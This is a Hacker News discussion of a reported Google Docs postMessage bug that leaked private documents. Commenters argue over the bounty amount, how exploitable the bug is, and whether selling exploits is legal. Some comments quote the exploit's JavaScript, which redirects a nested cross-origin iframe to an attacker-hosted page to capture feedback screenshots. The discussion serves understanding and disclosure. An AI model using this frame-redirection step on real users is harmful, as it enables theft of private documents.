Hacker News new | past | comments | ask | show | jobs | submit login
Stealing private documents through a bug in Google Docs (savebreach.com)
319 points by hackerpain on Dec 28, 2020 | hide | past | favorite | 138 comments



A few years ago, I built a platform for a client that allowed his customers to show a "Text Me" widget on their websites; the software handled all of the SMS / messaging and basically substituted conventional contact form or Intercom integration.

His customers used Google AdSense, who started blocking them until they removed the widget. The reason? This widget used an Iframe postMessage, but appropriately specified the singular sandboxed domain. As expected, we never were able to speak with a human at Google- they just sent my clients customers intimidating emails about a security flaw on their websites.

Seeing Google abuse the postMessage API with a wildcard argument after this fiasco is maddening! If only they were held to their own arbitrary and vague standards.


Myeah. Here is another example of Google misunderstanding postMessage and mistaking a vulnerability in a website for a vulnerability in a competing "Chromodo" browser, and making a big fuss about it: https://code.google.com/p/google-security-research/issues/de... (https://news.ycombinator.com/item?id=11023584)


It doesn't look like that to me.

There's a exploit demo here[1]. If the exploit worked in Chrome or Firefox as well as Chromodo, that would clearly indicate the problem is with the website, not with Chromodo. I find it hard to believe that no one at Google or Comodo would test the exploit page in Chrome or Firefox. There's discussion on the original bug and here[2] that Comodo did push out a fix, and it sure sounds like that was a fix to Chromodo.

Secondly, looking at the exploit demo, it looks like it does 2 postMessage()s, once in each direction, both using execCode. If it was a vulnerability purely in https://ssl.comodo.com the 2nd postMessage() looks like it would fail, because there isn't any code around to receive it.

Thirdly, looking at the exploit demo, it has a text box with which you can specify which site you want to attack. So you could change that to https://google.com or https://news.ycombinator.com . If the exploit only worked against a single site, it wouldn't make sense to provide a text box allowing you to change which site to attack.

Taviso's description is a bit misleading. It doesn't sound like the action that Comodo took is to directly disable the same origin policy, but rather to provide an API with which attackers can bypass the same origin policy. From a security perspective that does effectively disable the same origin policy, but from an attack understanding point of view, it's a bit different.

Full disclosure, I work at Google, but not on Project Zero.

[1] https://bugs.chromium.org/p/project-zero/issues/attachmentTe...

[2] https://bugs.chromium.org/p/project-zero/issues/detail?id=71...


I see, fair enough. Thanks for the explanation.


> Apparently https://ssl.comodo.com/ used to then proceed to execute that code. However, this is not a vulnerability in the browser, but in that website. Am I missing something? Was Chromodo breaking the `messageEvent.origin` property, breaking same-origin checks in JavaScript? Seems far-fetched.

I believe it's neither of these - I think the claim being made is that Chromodo installs a custom event listener for MessageEvents in all websites, which exposes a handful of APIs, including "execCode" and "callOuterFunction". If you look at the sample exploit (https://bugs.chromium.org/p/project-zero/issues/attachmentTe...), while it defaults to ssl.comodo.com, you can specify an arbitrary website.

(Also, if this were indeed a website bug, this would have been reproducible in normal browsers.)

We would need to find a vulnerable version of the Chromodo browser to confirm this.


This was a bug that affected multiple products and even crossed into the enterprise suite and google only rewarded $3.3K USD?

It’s almost as bad as Apple’s reward program


It's definitely a vulnerability, but to be a little more grounded in reality, to exploit this you need to somehow convince your victim to go to your website which contains the document you're trying to get access to.

So for this to work you need to know the document ID, and also the person who owns this document. You then need to trick them into looking at their document on your domain, and then from there, need to persuade them somehow to press the send feedback button.

I'd also note that the feedback button is a button that I suspect very very few people ever press. I certainly never have. I also don't know the IDs to any documents I might find interesting but can't read, and if I find a document via some random google search that I can't look at, I generally have no way of knowing how to contact the owner so I can try to send them phishing emails to get them to look at their document on a non-google URL.

There's been a bunch of cases where google has paid out very substantial bounties, and given the extreme difficulty of both meeting the attack prereqs and then managing to pull off a very sketchy exploit process at the same time I think the sum paid is more than fair.


Oh, I didn't even think about this, but I think you're right: there's no generic way of iframing a victim where you can see all their document IDs. This doesn't seem very plausible.


I'm on cc: lists with documents I don't have access to all the time. It depends on how organizations interact. And I suspect it wouldn't be very hard for me to iframe Google Docs and appropriately obscure things so someone does, indeed, click where I want.

$3.3k is about a week's worth of time for a poorly-paid developer before overhead.

It's not reasonable. At those rates, the only people who will be able to afford to be paid to do security work on Google products will be ones who sell on the gray/black market. The whole point of bounties was to give a path without the need for that.


Way easier to convince customer to share the document.


True, but I think a business account can disable the simple "share" to outside accounts and there would be more logs (of the type the business would be able to see) of what happened.

These exploits are often not so interesting as written and with current normal setups, but eventually become more interesting if never fixed.


Can you lay out a realistic exploitation scenario for this bug? It seems to have several predicates:

1. You need to know the document ID you're targeting (Stack Exchange once worked the ID out to ~256 bits).

2. You have to get the victim to interact with a Google doc on a site that you control (you need to re-dress the Google Docs interface, get the victim to your site, and then have them treat your site as if it was Google Docs).

3. You need to get the victim to use the Google feedback feature in order to trigger the vulnerable postMessage.

What's a scenario in which an attacker gets these stars to align? (I'm sure there is one).


Sure, why not:

1. I go to a job interview at a company that uses a chromebook with a restricted account. The interviewer sits next to me as I go through the process.

2. As we go through the steps in a google document, I need something from my resume on my website. I fumble with the URL bar slightly which hopefully has the doc ID, possibly because I once closed the document "by accident" and brought it back up.

3. While discussing whatever brought us to my website, I click on something but act like I am switching tabs.

4. At the end of the process in their document, I point out how strange the Google Docs looks now and press the feedback button to show my corporate soft skills.

5. The companies hiring interview document is now floating around my school and in 10 years half of their engineering is my Alma Mater.


At that level of realism there are much more efficient attacks

https://i.imgur.com/lkUV5Mf.jpg


This is implausible as well, no one simply 'goes to a company', offices are long gone.


Isn't this essentially a Clickjacking bug? Doesn't the victim have to (1) deliberately have a sensitive document open, (2) be somehow framed by an attacker's malicious IFrame, and then (3) click the "submit feedback" button to report a problem to Google?

All three of those conditions are independently rare. The equivalent conditions are rare in all CJ bugs, which is a reason CJs are sort of a running joke in appsec. This bug isn't a joke (look at the target and the impact), but condition (3) is also way more unlikely than the median CJ report somewhere else.

If I understand the bug correctly --- maybe I don't --- this researcher got what might perhaps be the largest bounty ever paid for a CJ bug.


This seems a bit different than clickjacking to me. In CJ, the victim performs sensitive actions because the UI is obscured. Here the UI is unobscured, and the user performs actions that should be fairly unsensitive.


(Googler, opinions on my own)

Are you sure this impacted multiple products? Reading the article the main reason he was able to exploit this for Google docs was the X-Frame-Options header. It's not clear that other products have this.


It works on other Google product that has the "Submit Feedback" link on it. I just tested this out with Google Webmasters and it's an issue there as well.


It is unlikely they wouldn't have checked other products as part of the fix. So I'm going to ask for more proof that you "tested this out".


[flagged]


You can't comment like this on HN; accusing other commenters of having secret conflicts of interest is the HN Guideline 'dang corrects most often here:

https://hn.algolia.com/?dateRange=all&page=0&prefix=false&qu...


Doesn’t seem like an accusation of a conflict of interest to me. Just pointing out who has the burden to test. Since one is paid by the company, it does make sense for testing the company’s products would be his responsibility first.

Whereas the previous comment was accusing the other one of lying about testing it.


Did I miss the place on this thread where the person we're talking about said they worked for Google?


Nope. Sorry. I messed up. Thought I saw the same person commenting who he already said they worked at Google.


An employee of X is better suited to investigate a bug in X than a non-employee is


>It’s almost as bad as Apple’s reward program

Or most/all bug bounty programs, actually.


I hear this refrain often, and it is of course never followed up with a solution.

What would you suggest, a bounty calculated via a multiple of company stock price?


I think its pretty obvious the solution to "not paid enough money" is "pay more money"


How should the price be discovered.


while (recipient_is_unhappy_with_amount) { amount *= 3.14; }


That’s an effective way for recipients to always be “unhappy” with the bounty.


How should their happiness be ascertained? Their word?


Offer them a job.


If you don’t like how much they pay, maybe don’t brand yourself a “security researcher” and then try to earn the equivalent of full-time pay by finding bugs in other peoples products and blogging about it?


This provides very little incentive for future good actors to search for these exploits... I had no idea the reward would be so low.


> This was a bug that affected multiple products and even crossed into the enterprise suite and google only rewarded $3.3K USD?

They could have also offered nothing, which was common up until a decade ago or so. Moreover there isn't a market for security bugs like this, so it's not like Google is underpaying relative to some independent valuation.

The only reason to pay more is out of some ethos that the reporter "deserves" more, but that's not how business works. The value Google obtains by finding any given vulnerability approaches 0. This is why, among other reasons, good product security teams spend most of their time doing things other than searching for vulnerabilities in existing code.


You do need to actually "give feedback" to trigger this, which seems a bit far off for a corporate worker - might be why they didn't think this was high impact, of course it should have been higher though.


The level of reward is related to the exploitability and attack vector not just the results of being exploited.


The most surprising part to me is that this works:

    window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
It's expected to me that you can change `window.frames[0].location`, since you can also change the "src" attribute of the iframe element. But you can't change the "src" attribute of an iframe inside that iframe, if it's not same-origin - so why can you change its location?

Maybe we should look into whether changing this would break any websites.


Context: Changing location was a way of message passing (just change the hash) before `postMessage` was widely available. Also, sometimes you are managing a widget embedded in a page which is embedded in your application.

That said, this is one of those things that might be best relegated to the "Phase 0" APIs now that there is a better way to do things (e. g. postMessage).


I see, thanks for the context. Perhaps, if changing the hash is the primary use-case, we could allow only that (in the `location` setter). Alternatively - browsers have been breaking various things in iframes recently (by e.g. isolating cookies), maybe breaking this as well would be acceptable if it's not commonly used..


It was also a way to do what XMLHttpRequest does before it existed.


I find it insane that people want to use apps built off this creaky technology.


You find it insane that the general public isn't concerned with (and/or doesn't understand) highly technical implementation details?


docs.google.com didn't have X-Frame-Options: DENY nor a restrictive CSP so I think its a browser quirk (rather, a clever bypass) that works here. Also, the author had exploited a postMessage flaw which wasn't validating the host name properly that led to the cross-origin leak of screenshot data

Check this out https://youtu.be/KpkrTUHoWsQ (video about URL validation bypass and SOP)


The missing header just means that docs.google.com can be embedded in an iframe, I'm not surprised about that. But the parent window still shouldn't be able to access the contents of that iframe. And in fact this doesn't work:

    document.getElementsByTagName('iframe')[0].contentDocument.getElementsByTagName('iframe')[0].src = "https://geekycat.in/exploit.html";
For obvious reasons (you can't access the DOM of a cross-origin iframe). So it's surprising that this works:

    window.frames[0].frames[0].location = "https://geekycat.in/exploit.html";


For legacy reasons the location object is special (you can write to it which is a proxy to writing to `location.href`). Some details here https://developer.mozilla.org/en-US/docs/Web/Security/Same-o...

This is actually quite difficult to protect against while keeping functionality intact (not granting allow-scripts to iframes would do it, but also obviously disable JavaScript).

The emerging https://github.com/dtapuska/documentaccess standard would be a defense-in-depth against this attack.


Myeah. I was aware that `WindowProxy.location` exists, but not that `WindowProxy.frames` exists. To me, that's the more surprising part - as `window.frames[0].location` should indeed be writable, but I feel like accessing `window.frames[0].frames` is more debatable - even knowing the number of iframes in a page might leak information in certain cases.


I agree this, seems wrong. Does it work in all browsers?


It seems there's a typo in the quote, but the following indeed works in both Chrome and Firefox:

    window.frames[0].frames[2].location = "https://example.com";
Even if `window.frames[0]` is cross-origin.


This behavior is defined in the HTML spec, here:

https://html.spec.whatwg.org/multipage/browsers.html#crossor...


To the people publishing these exploits and collecting the trivial bounties.

Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.


For a lot of that pursue white-hat career, it comes down to:

1. Principle - Some people are raised with really high morals and don't optimize for money. Depending on their own conscience, they wouldn't be able to sleep at night.

2. Obeying the law - Although one can easily make more money by using or selling these exploits, it can be a very dark path to dig yourself in. And depending on where you live the risk for life ruining litigation is very high too.

3. Brand reputation / Brand building / Professionalism - one can see that they can make more money for their own by building a solid portfolio of their achievements, and these bounties are a really strong signal when corporations look for security consulting. It also builds a good reputation which is really hard to build when doing white hat hacking for a living.


Kudos to them disclosing critical bugs to one of the largest companies on the planet for less than their developers get paid for a week of work.

Not saying they aren't good people, they are just undervaluing their work.


I mean point 3 is a big part of this value wise. By getting certified bounty-paid vulnerabilities in a big name product like google, they can then go on and get lucrative security contracts ("we hired a guy that has found bugs in google's products").

Also left unsaid is that these are products that people's grandparents use. So there is some very white-hat "help the public good" here. Even if it's also to the for-profit benefit of a mega corp. That's an issue for anti-trust courts, not people trying to make the world better (people use these products right now, that's the status quo; either it can be fixed now, or it can be part of a likely ineffectual protest that only harms others).


> very white-hat "help the public good" here

> trying to make the world better

Indicating that Google the company doesn't care about such things

(Although most individuals working there do)


Just to be be clear I'm not supporting the low value of the bounty.

My point is that there's more to it than just that. Aside from the subjective point 1 in my comment, I think points 2 and 3 are very objective and don't really depend on the pay of the bounty.

If they find the bug and try to sell it on the dark/grey market, you risk litigation. If they are smart they can derive more value from it than just the bounty, although the bounty being bigger would be nice and would encourage more white hat hackers to invest their time on these programs.


So google cheaps out on bounties because developers are clamoring to do free work for mega-adtech corp in hopes that the clout they get from it will pay out down the road.

That's the most dystopian thing I've heard in a while.


A different interpretation is that large companies are able to find bugs of this magnitude on their own on a weekly basis, and fix them before the public hears about them at all.


Apparently not.


If this bug works the way I think it does --- again, I could be wrong, but this looks like a pretty forward Clickjacking exploit to me --- there is nobody in the whole world that is going to pay what Google just did for it, because the only value this bug has is to be resold to Google for a bounty.


Spear phishing?


If you can spear phish someone into a fake Google Docs site to interact with a real document, you can almost certainly spear phish that person to simply reveal their credentials to you.


I see this sentiment frequently, but there many ways to make money if you ignore the ethics of the transaction.


> why you wouldn't just sell this off

Wouldn't it be immoral if not straight up illegal?


Specifically which law do people believe selling exploits violates? Off the top of my head I've only got "conspiracy"-like laws and international embargoes (depending on buyer).

Should it be illegal? Yeah, potentially. Is it? Unclear.


Why should it be illegal? From a US perspective, I don't think selling words/ideas should be illegal in most cases--especially just because it could be used for doing something illegal. For instance, there are books which describe chemical processes for synthesizing methamphetamine (https://www.amazon.com/Secrets-Methamphetamine-Manufacture-U...). But they are not illegal, because if they were it would infringe upon freedom of speech. Deciding what can and cannot be sold/published is a very authoritarian path to go down. It is better to just outlaw the criminal behavior.


I'm extremely wary of a law that would potentially criminalize that. It would almost certainly have to be very vague and prone to being abused by malicious prosecutors. How would you set it up such that it's illegal to sell an exploit to a supposedly malicious actor, but not illegal to sell or negotiate prices with the company maintaining the software or some other company that they deem to be their agent for managing security reports, per current White Hat practices?

Conspiracy convictions usually require proof that the suspect had created a plan to commit a serious crime and has taken active steps towards the execution of that plan, even if they haven't committed the actual crime yet.

We're already perilously close to US Federal Prosecutors being able to lock up anybody they don't like indefinitely. It's so exorbitantly expensive to fight Federal charges that hardly anybody really does, much less does successfully. The last thing we need is more vague Federal criminal laws with poorly thought out evidence and mens rea requirements.


There's no selling/negotiation in the current model. If you go to Google and say "I found this bug, I'll tell you what I did for $50K", that's extortion. If you disagree with their classification or payout, you can contest that classification in the system - but you are not arguing on the price of the exploit, you are arguing on what the exploit is.


At least accessory to crime if the exploit is used in a criminal activity, I presume?


If you traded it off tor with a burner computer at a cafe or something, there is absolutely no way anybody could trace it back to you. It took the FBI to catch the silk road guy several years and iirc they pinned him on buying a hitmans services, not drug trafficking.


While I agree with you, any competent lawyer could frame this under the Computer Fraud and Abuse Act


Illegal, including the logistics of selling it to shady/nation state actors. You can't just put a craigslist ad out for "selling google docs exploit" and expect them to reach out to you, if you don't already have contacts in the game you're probably not going to find a place to sell it (and then you might have issues receiving the money if you're US-based). The only grey area where you could really sell an exploit is something like zerodium https://zerodium.com/program.html


You could definitely find a place to sell it as no trust is necessary: it would be trivial to prove you have the exploit without revealing the details.


Your parent comment isn't talking about the difficulty of closing the transaction, but initiating it.


You really don't have to look hard to find forums where people are selling exploits for $10k and up, though I imagine for multi-million transactions there are different forums.


You can find people who claim all kinds of things on the internet. That doesn't mean they're credible.


If they were offering to buy for $10k and up, maybe that'd be different? (more likely to be serious? Or a honeypot somehow?)


What should be made illegal is selling and use of exploits. That would put a lot of those shady "security" companies in trouble...


You'd have to be pretty well connected wouldn't you? It's not like you can just put up a craigslist ad that says, "looking for cybercriminal to buy my hack".

But from the description, it doesn't sound like this vulnerability has much practical use. If you can convince someone to do all the things necessary to tee this up, you can probably just convince them to email you their password.


I'm pretty sure most humans are nice to each other because they enjoy it and feel obligated to be nice, not for reward nor fear of punishment.


That seems naive and is refuted by the existence of a legal system.


Quoting myself: "most". Therefore, the existence of a legal system does not refute the claim.

One example: At times it seems there are more dogs in my neighborhood than humans, yet, I thankfully seldom see dog poop left on the ground.


[flagged]


Now you're not even trying to engage in the logic of the conversation. I hoped for better in this forum.


Because it's difficult to, and difficult to ensure that those you're selling it to are trusted, means of transmission are secure and won't be intercepted etc etc... You also need the means to value it, how do you go about that?

This also does not build your career.

Saying

>Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.

Is just naïve.

3.3k for doing nothing but disclose is incredibly generous, especially for this where vector is incredibly targeted and needs private information to begin with (doc ID).


H So by that token, hats off to the developers who don't intentionally put bugs in their code when they could and allow a friend to capture the exploit to split the bounty.


I suppose if the bounties got really high, and higher and higher, eventually that'd start happening more and more often.


> Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.

Aside from the ethical considerations you'd have to navigate, there isn't a market for vulns like this outside of bug bounties.

People on HN always cite Zerodium or whatever but don't realize those markets exist for vulns with a long half life. The expected return on a vuln which exists in one website is quite bad.


Not everyone do bad things for a living.


Fun? Integrity? Professionalism? The fact that there isn't a market for these kinds of bugs?


https://zerodium.com/program.html

Google's SaaS apps aren't specifically in scope, but I'm not seeing exclusions, and I'm seeing potential parallel programs ("sensitive information disclosure: - MS Office (Word/Excel)") that could imply that they'd be comfortable buying SaaS Productivity Suite exploits as well.

I'm not OP. I'm only presenting this to counter the assertion that there's no market.


Because it is ilegal?


I thought the US govt actively BOUGHT these types of cracks and hacks and used tools that used them.

How do police departments crack open phones?

Does this mean they are breaking the law by buying these exploits?


Is it? Which law is being broken?


Which law does selling a exploit break?


Most people aren't sociopaths.


Agree to disagree.


Curious question, if you find a few vulnerabilities like this, does it mean that you could get hired by Google to do this internally?

What I'm trying to ask is: does this make the hiring process easier?


It definitely can help. In my experience, finding these kinds of bugs can help you get the interview, but it doesn't necessarily help that much once you get to the interview since the interview process is still standardized and focuses on evaluating you across a number of different areas (not just vulnerability research). But it definitely helps get some good attention!

Disclosure: I work at Google on their security team and reported a number of bugs to their VRP before I got hired.


Sure, you could get hired like anybody else after passing week long string of whiteboard exams.

Start dropping zero days on twitter if you really want to get hired:

https://nakedsecurity.sophos.com/2019/06/13/microsofts-battl...

wah wah bad person publishing zero days wah wah Irresponsible disclosure hurts everyone. wah wah

reality: https://krebsonsecurity.com/2020/04/microsoft-patch-tuesday-... got hired @Microsoft, started fixing other bugs they didnt know they had


I've gotten hired because of vulnerability reports. It helped skip a lot of the "convince me that you know what you're doing" phase of interviews and it was then mostly just social/team fit!


No and if it came up it would work against you. It means you are working for basically free for Google at least you can put it on your resume although that might work against you.


Good lord, $3K for this?

These companies give two craps about security.


Google should have awarded a much larger value to this. Like $100k. This is a serious flaw.


What makes you say this is a serious flaw? It seems pretty minor to me. The page would have to be embedded (so the URL would be obviously wrong) and it requires several steps of manual user action with an uncommonly used feature (the feedback form) just to exfiltrate a tiny amount of data (the iframe viewport)


Right, but the potential surface area - basically all docs including private ones - is absolutely huge. Preventing this from happening even once it's worth more than 100k IMO.


(googler here, uninvolved with this bug though)

It also requires that the user know the document ID- so they would have to identify a document that they want access to, get the ID of that document, embed the document in a website that they can present to a user that DOES have access to that document (which they would be unable to know from the document itself, because the ACLs are only visible to people with view access), and then get them to click submit feedback.

I'll defer to others with more familiarity with bug bounties about the payout appropriateness, not my area of expertise, but it does seem like this would be a very difficult bug to exploit


Minor? Depends on if you use the private doc feature and what lawsuits may follow. One of them will cost more than the bounty just to look at.


Right, but you'd somehow need to not only get your hands on the URL of a private doc but then inexplicably convince them to use the "send feedback" feature on that same private doc. This is a neat bug, don't get me wrong, but I don't think this is even something most would consider exploitable. IMO this is equally exploitable as telling the victim to hit the button labeled "PrntScr" on their keyboard and then hit Control-V/


"so the URL would be obviously wrong": The average user have no idea that an URL could be "wrong".


Such a user would be fooled by a plain old phishing attack then and there'd be no need for such sophisticated methods.


I don't really know but maybe if you insert URL of <Clone Document> so the user clone some well-crafted Document, this document may access some other documents and a screenshot may leak them.

It only a possibility but usually once you have the XSS puzzle piece, getting the data may be as trivial as some JS code


Do you seriously expect them to pay $100k for a decently serious bug in only one of their products?

In comparison, Apple paid 100k [0] for a full account takeover, using an bug so simple that it is unbelievable that it could have passed a code review and testing.

[0]- https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-a...


Perhaps it shouldn't be Google paying for the security reports, but the government... who then would need the statutory authority to fine Google for a very handsome profit?


Yes, $100k is not a lot of money for an issue like this. It's also not a lot of money in Google's security budget.

Apple's payout seems rather low to me. If I had a vuln like that and knew they were only paying $100k, I would probably seek to monetize it elsewhere.

$3k is almost insulting for something like this, given Google's scale. $31,337 might be more appropriate to at least avoid insult.


> Yes, $100k is not a lot of money for an issue like this.

Requiring rare user action and document URL? Sure. Live in your bounty bubble.

> If I had a vuln like that and knew they were only paying $100k, I would probably seek to monetize it elsewhere.

But you don't. The person exploiting it knows how much it is worth.

> $3k is almost insulting for something like this

Not for you to decide. He accepted it, meaning it's not insulting.


this one technically requires some user interaction

Anyway, in the past I found a way to takeover an organization account in Google cloud acquisition and they rewarded me $100, saying their "Panel" decided that, Google's VRP panel sucks, so you're right about that.


I would stop sending these in and keep them for myself. I may trade them or sell them or write about but I wouldn't give them to google in the hopes of a payment.


I am sorry but that can ruin your career as its illegal. You can't sell or, trade vulnerabilities on live websites like Google as per the terms and conditions of the Google VRP (Responsible Disclosure policy) while it may seem unfair, its illegal to do so.


It’s not illegal, criminally, to break terms and conditions. At least in the US.

You may have some impact on your career and be judged by your peers or perhaps brought to civil court for damages, but if done right it’s totally legal to sell exploits.


> Google rewarded $3133.7 for this bug under their VRP program.

It's a pretty odd amount too. I'm curious how they arrive at that number.


It's an old hacker reference to "eleet": https://en.m.wikipedia.org/wiki/Leet


Google VRP team has a tradition to reward 4 figure and 5 figure amounts to match 1337 or, L33T (Leet or, Elite).

Example bounty amounts - $1337, $3133.7, $13337 and $31337


The 1337 could be a nod to gamer culture because it stands for “leet” and may be popular with the folks who participate in bug bounties. Pure speculation on my part here.

EDIT: yep, looks like I missed all the other comments pointing this out, mobile app didn’t load them for some reason. Leaving the comment anyway.


Just to expand on this a bit, 31337 goes waay back. Before 'gamer culture' was a thing, and was popular enough to where it got mentions in the 1995 movie Hackers.

I vividly remember BBS and IRC handles with variations of 31337 in them in the 80s. I'm sure it goes back even farther.


I think someone tried to be cute by having '1337' in the sum. If the figure wasn't so insultingly low it would've been fun.


Client-side encryption really decreases the attack surfaces of cloud storage solutions.

It’s really sad that Keybase failed at building a business around this. Hopefully someone else is going to make another attempt.


It wouldn't have prevented this issue though.


Oh, right...true.


No one cares more about your data than you do. Syncdocs https://syncdocs.com also does end-to-end encryption of Google Docs.

The problem is that encryption adds an extra layer of complexity.


If the client-side encryption is in the browser, it would not help: this hijacks channel between two different parts of application, not the cloud storage connection.

Having native, non-web app would help here, but I don't think this is ever going to happen.


> Client-side encryption really decreases the attack surfaces of cloud storage solutions.

They should rename end-to-end encryption to client-side encryption or something else because it is not very clear what it means


Not all client-side encryption schemes are end-to-end or at-rest encryption schemes though. Trivial counter example: TLS.


We're making an attempt with Peergos.


Not sure how Peergos is a relevant alternative to Keybase? Maybe you're just thinking of the file sharing aspect of Keybase?

Keybase as it's core was that it's a key directory that's publicly auditable. Everyone could verify the chain of verification of each other in Keybase. On top of that infrastructure, files and chat was added.

Peergos doesn't seem to show any chains or in fact auditable information at all. You can add/remove friends that is supposedly cryptographically verified, but there is no information about it, nor is there any information about where the data is actually stored, how you can get it to your local machine, how to re-verify the claims, how to add devices that have access.


There is a public append-only merkle-tree with all identities published in it in an analogous way to certificate transparency. When you add a friend you are looking them up in this tree and then storing their public key chain in your own (private) storage in a tofu manner (then any key changes they make are verified against your local copy).

You can also verify keys in person using the same protocol as Signal (via QR codes or number groups).

There are no private keys stored on any devices, so adding devices is not a thing. It is a pure capability based system.

Unlike keybase, we are fully open source and self-hostable.

There are a lot more details in our booklet- https://book.peergos.org


Thanks for going through the write-up. As an author of the bug,considering the the impact, user interaction required and other criteria that need to line up to exploit this bug I feel Google VRP's decision on this bug is accurate.


TBO not surprised at all Gdocs had an issue




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: